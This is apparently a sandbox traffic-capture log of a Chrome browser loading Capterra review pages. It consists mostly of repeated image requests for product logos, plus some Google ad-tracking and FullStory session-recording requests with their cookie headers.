        Source: global trafficHTTP traffic detected: GET /ProductLogo/8d54c31f-ffb8-435c-9795-73330c5d470c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/ed3785e7-b737-401b-819f-b042945c26a2.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/9f57a44f-9475-4cc5-9886-3822c18b54d1.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/67711109-055d-46d1-bf60-43ba35ef896d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034620739&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfodvXHpcqioDfHrEmWKpzoLF8fM3tgF1U4kWr-cgKjSuVr1zR&random=2234944505&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/7af09000-3e24-45a2-815f-7ccb9c0dcc7e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f0d90c26-fb48-482e-bfed-fd16809bc437.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/442879c8-fca4-4a7c-b165-49dc05cf7999.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/8d54c31f-ffb8-435c-9795-73330c5d470c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/ed3785e7-b737-401b-819f-b042945c26a2.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/505b4ccb-8f48-405a-bd30-39a80ed24293.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/4e2671a7-72b7-4638-9434-190c249607a3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/7af09000-3e24-45a2-815f-7ccb9c0dcc7e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/69d55a02-59f1-4cbf-aabd-353fd6b19bca.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/9efb2a2f-43b2-4ebd-bf24-b9bb46bd93c6.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034620739&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfodvXHpcqioDfHrEmWKpzoLF8fM3tgF1U4kWr-cgKjSuVr1zR&random=2234944505&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/6571081c-36c2-42ed-9ae6-ffbf5ed12e58.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/505b4ccb-8f48-405a-bd30-39a80ed24293.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/0a941fc9-5fda-4010-807b-044a6d6ff89b.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/1169750b-93b3-4296-9407-d5f4cc984d40.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/4e2671a7-72b7-4638-9434-190c249607a3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/69d55a02-59f1-4cbf-aabd-353fd6b19bca.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/df25f33b-71a1-46b2-8520-02d04ac23097.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/9efb2a2f-43b2-4ebd-bf24-b9bb46bd93c6.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fsrelay/rec/bundle/v2?OrgId=18VAT4&UserId=da9f39f7-d4a4-45f4-948f-86299cb47816&SessionId=084a7745-8adb-4b14-adf2-26e4e4ddbd6e&PageId=e2e5b10c-4bbc-4510-b497-529b569fdc46&Seq=1&ClientTime=1725034627669&PageStart=1725034624939&PrevBundleTime=0&LastActivity=2369&IsNewSession=true&ContentEncoding=gzip HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A17%3A07+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=NotLandingPage&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1&AwaitingReconsent=false; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034627.40.0.0; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
        Source: global trafficHTTP traffic detected: GET /ProductLogo/6571081c-36c2-42ed-9ae6-ffbf5ed12e58.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/27a50d30-49b3-4fb0-902d-34d05a775b15.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/713f882b-f7a1-4f3f-a484-7af2fe13f5c3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/0a941fc9-5fda-4010-807b-044a6d6ff89b.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/1169750b-93b3-4296-9407-d5f4cc984d40.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/35e9db05-94a1-4859-b307-858b9d3946cb.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/df25f33b-71a1-46b2-8520-02d04ac23097.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
